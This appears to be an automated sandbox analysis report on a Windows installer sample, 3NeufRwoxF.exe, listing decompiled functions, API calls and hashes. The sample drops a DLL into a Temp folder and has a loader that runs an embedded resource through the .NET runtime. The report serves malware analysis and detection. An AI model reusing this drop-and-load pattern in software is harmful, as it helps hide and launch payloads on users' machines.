SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728

Uniqueness

Uniqueness Score: -1.00%

Function 004052E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x004052ee
0x0040530a
0x00405312
0x00405317
0x00000000
0x0040531d
0x00405321

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
CloseHandle.KERNEL32(?), ref: 00405317

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
Error launching installer, xrefs: 004052F8

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-1785902839
Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69

Uniqueness

Uniqueness Score: -1.00%

Function 00405578, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}

0x00405579
0x00405590
0x00405598
0x00405598
0x004055a0

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
lstrcatA.KERNEL32(?,0040900C), ref: 00405598

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405578

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x00401ec7
0x00401ecf
0x00401ed4
0x00401ed9
0x00401edd
0x00401ee0
0x00401ee2
0x00401ee9
0x00401ef2
0x00401efa
0x00401efd
0x00401f12
0x00401f18
0x00401f2b
0x00401f34
0x00401f40
0x00401f45
0x00401f45
0x00401f2b
0x00401f48
0x00401b75
0x00401b75
0x00401efd
0x00402880
0x0040288c

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction ID: 32b4c4ba67c2d4aeec558e743cb191f9ba8cb92773df28d6a4a6bb64e08d8cf3
Opcode Fuzzy Hash: 4b5e31b804a9b772dc9bfcad09cdc0cdcb843d4ad43fb5df833395ad42dead39
Instruction Fuzzy Hash: 43111CB2900108BEDB01EFA5D945DAEBBB9EF04354B20807AF505F61E1D7789E54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af6c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af7c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af83 = 1;
				 *0x40af80 = _t11 & 0x00000001;
				 *0x40af81 = _t11 & 0x00000002;
				 *0x40af82 = _t11 & 0x00000004;
				E00405AA7(_t18, _t24, _t26, 0x40af88,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af6c);
				_push(_t14);
				_push(_t26);
				E004059E3();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d29
0x00401d42
0x00401d4c
0x00401d51
0x00401d5c
0x00401d63
0x00401d75
0x00401d7b
0x00401d80
0x00401d8a
0x004024aa
0x00401561
0x00402825
0x00402880
0x0040288c

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
CreateFontIndirectA.GDI32(0040AF6C), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F

Uniqueness

Uniqueness Score: -1.00%

Function 00403897, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405AA7(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

0x0040389b
0x004038a0
0x004038a6
0x004038ab
0x004038ab
0x004038b3
0x00000000
0x00000000
0x004038bb
0x004038c3
0x004038c5
0x004038cb
0x004038cb
0x004038cd
0x004038d9
0x00000000
0x00000000
0x004038dd
0x00000000
0x00000000
0x00000000
0x004038df
0x004038e4
0x004038ed
0x004038f3
0x004038f8
0x0040390c
0x00403917
0x0040392f
0x00403935
0x0040393a
0x00403942
0x00403963
0x00403963
0x00403963
0x00403944
0x00403946
0x00403946
0x0040394a
0x00403951
0x00403951
0x00403956
0x0040395c
0x0040395c
0x00000000
0x00403946
0x004038fa
0x004038ff
0x00403908
0x00403901
0x00403901
0x00403901
0x004038ff

APIs

SetWindowTextA.USER32(00000000,004236A0), ref: 0040392F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403898
1033, xrefs: 0040389B, 004038A5, 00403916

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-517883005
Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58

Uniqueness

Uniqueness Score: -1.00%

Function 00404D73, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420480 != _t22) {
							 *0x420480 = _t22;
							E00405A85(0x420498, 0x424000);
							E004059E3(0x424000, _t22);
							E0040140B(6);
							E00405A85(0x424000, 0x420498);
						}
						L11:
						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004046F2(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403E83(0x413);
				return 0;
			}

0x00404d7f
0x00404da4
0x00404dc4
0x00404dc7
0x00404dca
0x00404de1
0x00404de7
0x00404dee
0x00404df5
0x00404dfc
0x00404e01
0x00404e07
0x00000000
0x00404e17
0x00404db1
0x00404e04
0x00404e04
0x00000000
0x00404e04
0x00404dbd
0x00404dbf
0x00000000
0x00404dbf
0x00404d85
0x00000000
0x00000000
0x00404d8c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404DA9
CallWindowProcA.USER32 ref: 00404E17

Part of subcall function 00403E83: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403E95

Strings

, xrefs: 00404D81

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E004029E8(0x11));
				} else {
					E004029CB(1);
					 *0x409f68 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024b0
0x004024b0
0x004024b3
0x004024ce
0x004024b5
0x004024b7
0x004024bc
0x004024c3
0x004024d5
0x0040264e
0x0040264e
0x004024db
0x004024ed
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x00402880
0x0040288c

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll,00000000,?,?,00000000,00000011), ref: 004024ED

Strings

C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll, xrefs: 004024BC, 004024E1

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsvCA57.tmp\qvddvmam.dll
API String ID: 427699356-1231187557
Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004055BF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004055BF(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x004055c0
0x004055ca
0x004055cc
0x004055d3
0x004055db
0x00000000
0x00000000
0x00000000
0x004055db
0x004055dd
0x004055e2

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3NeufRwoxF.exe,C:\Users\user\Desktop\3NeufRwoxF.exe,80000000,00000003), ref: 004055C5
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3NeufRwoxF.exe,C:\Users\user\Desktop\3NeufRwoxF.exe,80000000,00000003), ref: 004055D3

Strings

C:\Users\user\Desktop, xrefs: 004055BF

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9

Uniqueness

Uniqueness Score: -1.00%

Function 004056D1, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056D1(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x004056dd
0x004056df
0x00405707
0x004056ec
0x004056f1
0x004056fc
0x00000000
0x00405719
0x00405705
0x00405705
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Memory Dump Source

Source File: 00000000.00000002.655618767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655607705.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655678725.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655695462.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655746163.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655768064.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655776920.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3NeufRwoxF.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 3NeufRwoxF.exe PID: 4828 Parent PID: 4484 3NeufRwoxF.exeCOMMON

Execution Graph

Execution Coverage:	15.3%
Dynamic/Decrypted Code Coverage:	21.6%
Signature Coverage:	4.7%
Total number of Nodes:	666
Total number of Limit Nodes:	21

Executed Functions

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v2.0.50727, xrefs: 00401053

Memory Dump Source

Source File: 00000002.00000002.733760702.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_3NeufRwoxF.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v2.0.50727
API String ID: 2372384083-2350909873
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 024337AF, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 213
